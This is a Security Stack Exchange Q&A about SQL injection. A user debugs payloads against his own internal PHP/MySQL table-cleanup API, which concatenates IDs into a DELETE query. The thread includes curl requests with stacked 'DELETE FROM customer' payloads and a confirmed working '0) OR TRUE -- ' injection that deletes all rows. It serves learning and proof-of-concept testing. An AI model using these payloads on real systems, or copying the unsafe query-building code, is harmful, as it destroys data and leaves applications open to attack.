2

I have internal API tool to clear database tables for testing, the code is unsafe and I want to write a small PoC. I however have troubles successfully executing this basic SQL-injection.

This function generates the query which will be executed:

 private function createQuery(Table $table): string { if ('' === $table->conditional()) { return sprintf('DELETE FROM `%s`;', $table->name()); } return sprintf('DELETE FROM `%s` WHERE %s;', $table->name(), $table->conditional()); }

It is possible to pass specific IDs to the API to not delete the whole table, but only specific rows. The conditional string is made like this:

 public static function createConditional(string $primaryKey, array $ids, bool $hexPrimaryKey = true): string { if ([] === $ids) { return ''; } return $primaryKey.' in (' . implode('", "', $hexPrimaryKey ? array_map(static fn ($id) => '0x'. $id, $ids) : array_map(static fn ($id) => '"'. $id . '"', $ids)) .')'; }

Finally the query is executed

 $query = $this->createQuery($table); //dd($query); $affectedRows = (int) $this->connection->executeStatement($query);

A normal request generates the following query:

curl -X POST http://127.0.0.1:8000/api/table-cleanup -H "Content-Type: application/json" -H "Authorization: Bearer $TOKEN" -d '{"types": {"products": ["11dc680240b04f469ccba354cbf0b967"]}}' => DELETE FROM `product` WHERE id in (0x11dc680240b04f469ccba354cbf0b967);

I am trying to craft a query to delete another table:

curl -X POST http://127.0.0.1:8000/api/table-cleanup -H "Content-Type: application/json" -H "Authorization: Bearer $TOKEN" -d '{"types": {"products": ["11dc680240b04f469ccba354cbf0b967; DELETE FROM customer;--"]}}' => DELETE FROM `product` WHERE id in (0x11dc680240b04f469ccba354cbf0b967; DELETE FROM customer;--)

Parsing the generated query in my mysql-cli gives this output but does delete the table:

mysql> DELETE FROM `product` WHERE id in (0x11dc680240b04f469ccba354cbf0b967; DELETE FROM customer;--) ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 Query OK, 1 row affected (0.00 sec) -> ; ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '--)' at line 1

But in PHP it just gives an error but doesn't delete anything.

Another attempt:

curl -X POST http://127.0.0.1:8000/api/table-cleanup -H "Content-Type: application/json" -H "Authorization: Bearer $TOKEN" -d '{"types": {"carts": ["0; \";DELETE FROM customer;; -- "]}}' | lynx -stdin => DELETE FROM `cart` WHERE token in ("0; ";DELETE FROM customer;; -- ");

Again, works in the mysql-cli but in PHP gives this error:

 SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0027;DELETE FROM customer;; -- \u0022)\u0027 at line 1"
Improve this question
3
  • This is a pure programming question. It is off-topic on Security SE. I suggest to move it to SO.
    – mentallurg
    CommentedJul 30, 2024 at 21:15
  • @mentallurg It would be a programming question if I would be asking how to write a SQL query or how to solve the SQLi-vulnerability. But I am asking for a way to forge the request to exploit a vulnerability; that is not purely programming.
    – O'Niel
    CommentedJul 31, 2024 at 0:52
  • @oniel: You are asking why your SQL is not syntactically correct. Also the response shows how to create a "syntactically valid SQL". That's why why it is a pure programming question and is off-topic on Security SE.
    – mentallurg
    CommentedAug 1, 2024 at 4:41

1 Answer 1

Reset to default
6

None of what you've shown is syntactically valid SQL. For example, an opening parenthesis needs to be closed at some point. The same is true for double quotes. This isn't specific to SQL injection attacks; it's basic syntax.

Besides that, you cannot simply append another query to the current one. Executing multiple queries are a special feature of some database systems (like MySQL) which, depending on the database interface, requires the application to call a separate function or enable a particular setting.

In general, injection attacks only allow you to manipulate the current query, e.g., by changing the condition of the the WHERE clause.

For example, in this case you could delete all rows by injecting 0) OR TRUE -- . This results in the following query:

DELETE FROM `product` WHERE id in (0x0) OR TRUE -- )

The 0x0 is just a dummy value to fill the list of the IN condition. By using OR TRUE, the WHERE condition is always fulfilled, regardless of the part before. And a comment is used to to get rid of the trailing parenthesis which comes from the original IN list.

Improve this answer
5
  • And is it possible to manipulate the query with the current code, to e.g insert something like (SELECT id from product) into the WHERE IN to delete all rows?
    – O'Niel
    CommentedJul 30, 2024 at 14:49
  • @O'Niel: You cannot reference the same table in the FROM clause of a DELETE query and a subquery within the WHERE clause, but to delete all rows, you could construct the query DELETE FROM product WHERE id IN (0) OR TRUE -- ), where the 0 is a dummy value, and the OR TRUE automatically fulfills the condition.
    – Ja1024
    CommentedJul 30, 2024 at 16:12
  • I tried your command curl -X POST http://127.0.0.1:8000/api/table-cleanup -H "Content-Type: application/json" -H "Authorization: Bearer $TOKEN" -d '{"types": {"product": ["0) OR TRUE --"]}}' | lynx -stdin and got this output: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0027)\u0027 at line 1
    – O'Niel
    CommentedJul 30, 2024 at 19:38
  • 1
    @O'Niel: There’s a missing space after the -- comment. There also seem to be single quotes in the query (unicode U+0027), so the queries you’ve posted above apparently don't reflect what's actually executed. In any case, if you want to do SQL injection attacks, you have to be willing to spend some time on debugging and research. It's normal that it takes a few tries to get the attack working.
    – Ja1024
    CommentedJul 30, 2024 at 19:53
  • Amazing. With the space it indeed works. Thanks mate.
    – O'Niel
    CommentedJul 31, 2024 at 0:48

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.